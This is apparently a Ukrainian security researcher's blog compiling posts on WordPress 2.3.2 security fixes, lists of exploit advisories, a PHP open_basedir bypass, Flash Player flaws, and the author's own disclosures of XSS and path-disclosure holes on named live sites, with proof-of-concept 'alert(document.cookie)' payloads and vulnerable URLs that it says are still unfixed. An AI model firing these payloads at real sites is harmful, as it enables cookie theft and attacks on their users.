Websecurity - Веб безпека

Наприкінці грудня, 29.12.2007, вийшла нова версія WordPress 2.3.2 - оновлення для гілки WP 2.3.x.

WordPress 2.3.2 це багфікс та секюріті випуск для 2.3 серії. В даній версії було виправлено багато багів та уразливостей, в тому числі серйозних уразливостей, про які я писав в грудні.

Зазначу, що в офіційному пості на сайті зазначені не всі виправлення, а лише частина - про деякі виправлення зумисно не було повідомлено в пості. Про них можна дізнатися лише подивившися детальну інформацію про зміни в файлах. На сторінці Trac з переліком виправлень також наведені не всі виправлення (зокрема не всі секюріти фікси).

Офіційно розробники WP повідомили, що в WordPress 2.3.2 виправлений баг з витоком інформації про чорнетки, а також пофіксені Information disclosure уразливості (виявлені мною), та були виправлені витоки інформації в XML-RPC та APP реалізаціях. В якості бонуса, в версії 2.3.2 була додана можливість задавати власну сторінку з повідомленнями про помилки в БД.

Як наводиться в Trac були виправлені наступні баги та уразливості:

• Покращена швидкодія роботи системи (оптимізовані функції sanitize_post та sanitize_post_field)
• По замовчуванню не виводяться повідомлення про помилки в БД (поки не встановлено WP_DEBUG в true). Нарешті вони зробили те, про що я просив їх ще в жовтні 2006, коли знайшов перші SQL DB Structure Extraction в WP
• Власна DB Error Page
• Обмежений витік інформації в XML-RPC
• Виправлена дірка в query.php, що приводила до витоку інформації про чорнетки
• Скрипти setup-config.php та install.php тепер перевіряють на коректний зв’язок з MySQL

Але це не вся інформація про секюріти виправлення в WP 2.3.2. Як повідомив Peter Westwood в своєму пості WordPress 2.3.2 in detail, в даній версії було зроблено набагато більше виправлень (ніж повідомлено в офіційному пості).

Він навів 12 найбільш важливих виправлень. Окрім вище наведених (в Trac) 6 виправлень, також відзначу наступні:

• Введені різні правила для різних типів URI
• Виправлена XSS уразливість в wp-mail.php
• Обмежений витік інформації в xmlrpc методі wp.getAuthors
• Додані додаткові перевірки в методах xmlrpc
• Додані додаткові перевірки в APP сервері
• Виправлена функція validate_file() для протидії Directory traversal (на Windows) - про численні Local file include, Directory traversal та інші уразливості (що були виправлені в даній версії) я писав раніше

Зазначу, що хоча в цій версії виправленні численні Directory traversal та Local file include та Information disclosure уразливості (знайдені мною), а також відключене по дефолту виведення помилок роботи з БД (що я пропонував їм зробити ще в 2006 році), розробники жодного разу не згадали про мою допомогу, що є дуже нечемно. Більш того, вони не відповіли на більшість з моїх останніх листів і не подякували мені, лише тихенько виправили дірки (і навіть не про всі з них згадали в офіційному пості), що дуже несерйозно з їхнього боку.

Також зазначу, що дані уразливості, про котрі я писав в грудні, виправлені лише в версії WP 2.3.2 (тобто в гілці 2.3.x). Всі попередні версії, зокрема гілки 2.0.x, 2.1.x та 2.2.x (в тому числі останні версії в цих гілках) є вразливими.

08.08.2007

У лютому, 09.02.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting уразливості на проекті ftpsearch.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

06.01.2008

XSS:

http://ftpsearch.com.ua

POST запит на сторінці http://ftpsearch.com.ua/profiles.php?
sid=20070808&what=emailstory:

"><script>alert(document.cookie)</script>В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.

</textarea><script>alert(document.cookie)</script>В полі: Короткое сообщение.

http://i.ftpsearch.com.ua

• alert(document.cookie)
• цікавий
• html включення

http://google.ftpsearch.com.ua

• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

В даній добірці експлоіти в веб додатках:

• Joomla Component Restaurante Remote File Upload Vulnerability (деталі)
• AuraCMS 1.5rc Multiple Remote SQL Injection Vulnerabilities (деталі)
• phpRealty 0.02 (MGR) Multiple Remote File Inclusion Vulnerabilities (деталі)
• Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability (деталі)
• AuraCMS 2.1 Remote File Attachment / LFI Vulnerabilities (деталі)
• Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit (деталі)
• X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities (деталі)
• NuclearBB Alpha 2 (root_path) Remote File Inclusion Vulnerability (деталі)
• KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability (деталі)
• RPS 6.2 SQL Injection Exploit (деталі)

У грудні, 27.12.2007, я знайшов дві Cross-Site Scripting уразливості на http://livejournal.com - популярному проекті LiveJournal (ЖЖ). Котрі пропонуються вашій увазі.

XSS:

Уразливості в файлі http://www.livejournal.com/preview/entry.bml.

livejournal.com XSS.html

livejournal.com XSS2.html

Розробникам LiveJournal потрібно більше слідкувати за безпекою свого проекту.

Виявлений обхід захисту безпечного режиму в PHP (safemode bypass).

Уразливі версії: PHP 5.2.

Використовуючи конструкції LOAD_FILE, INTO DUMPFILE, INTO OUTFILE можна звертатися до файлів за межами дозволеного каталогу.

• PHP <=5.2.4 open_basedir bypass & code exec & denial of service (деталі)
• PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass (деталі)

Оновив сьогодні тестування з веб безпеки, в якому ви можете перевірити рівень своїх знань з веб безпеки. Тест базуєтья на моїй системі тестування FlashTestSystem.

В оновленій версії додав 10 нових запитань, цього разу по п’ятому розділу мого Посібника з безпеки. Тепер у тесті 30 запитань на web security тематику (котрі базуються на перших п’яти розділах мого посібника).

Вдалого тестування .

В даній добірці уразливості в веб додатках:

• Multiple PHP remote file inclusion vulnerabilities in Harpia CMS (деталі)
• Command execution vulnerability in SCart 2.0 (деталі)
• Variable extract vulnerability in Apache Stats (деталі)
• Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard (деталі)
• PHP remote file inclusion vulnerability in TagIt! Tagboard (деталі)
• SQL injection vulnerability in PollMentor 2.0 (деталі)
• Buffer overflow in lighttpd (деталі)
• Декілька уразливостей в PostgreSQL (деталі)
• Vulnerability in phpProfiles (деталі)
• Vulnerability in phpProfiles (деталі)
• Multiple vulnerabilities in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
• SQL-ін’єкція в ClickContact (деталі)
• Multiple cross-site scripting vulnerabilities in PWP Technologies The Classified Ad System (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in PHP Live! (деталі)
• Обхід аутентифікації та SQL-ін’єкція в SimpleBlog (деталі)

Виявлені численні уразливості в Adobe Flash Player. Стосовно останніх уразливостей у флеші я згадував в новинах про те, що 500000 flash файлів на популярних сайтах уразливі до XSS.

Уразливі версії: Adobe Flash Player 7.0, Flash Player 8.0, Flash Player 9.0.

Зокрема виявлено переповнення буфера динамічної пам’яті при обробці JPEG, універсальний міжсайтовий скриптінг, DNS rebinding та витік інформації.

• XSS Vulnerabilities in Common Shockwave Flash Files (деталі)
• Socket Connection Timing Can Reveal Information About Network Configuration (Exploit) (деталі)
• Adobe Updates for Multiple Vulnerabilities (деталі)
• Adobe Flash Player ActiveX Control Universal Cross-Site Scripting Vulnerability (деталі)
• Adobe Flash Player JPG Processing Heap Overflow Vulnerability (деталі)

04.08.2007

У лютому, 08.02.2007, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті www.complex.lviv.ua (інтернет-магазин). Про що найближчим часом сповіщу адміністрацію проекту. Котрий розробили ті ж люди, що і auction.ua, про уразливість в якому я вже писав.

Детальна інформація про уразливості з’явиться пізніше.

04.01.2008

Full path disclosure:

http://www.complex.lviv.ua/comp/index.php?check1=pr&form_pidp=&name_pidpr=&index=&city=&adress=&surname=&name=&fathername=&kod=&phone=&mail=&rahunok=test

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені. Що є звичайною ситуацією для даних розробників (халатне відношення до безпеки вони демонструють і на auction.ua).

В даній добірці експлоіти в веб додатках:

• Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection Vulnerability (деталі)
• Online Fantasy Football League (OFFL) 0.2.6 RFI Vulnerabilities (деталі)
• phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability (деталі)
• Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities (деталі)
• Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln (деталі)
• fuzzylime cms <= 3.0 Local File Inclusion Vulnerability (деталі)
• Focus/SIS <= 1.0/2.2 Remote File Inclusion Vulnerabilities (деталі)
• TLM CMS 3.2 Multiple Remote SQL Injection Vulnerabilities (деталі)
• WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities (деталі)
• Docebo Multiple Cross-Site Scripting Vulnerabilities (деталі)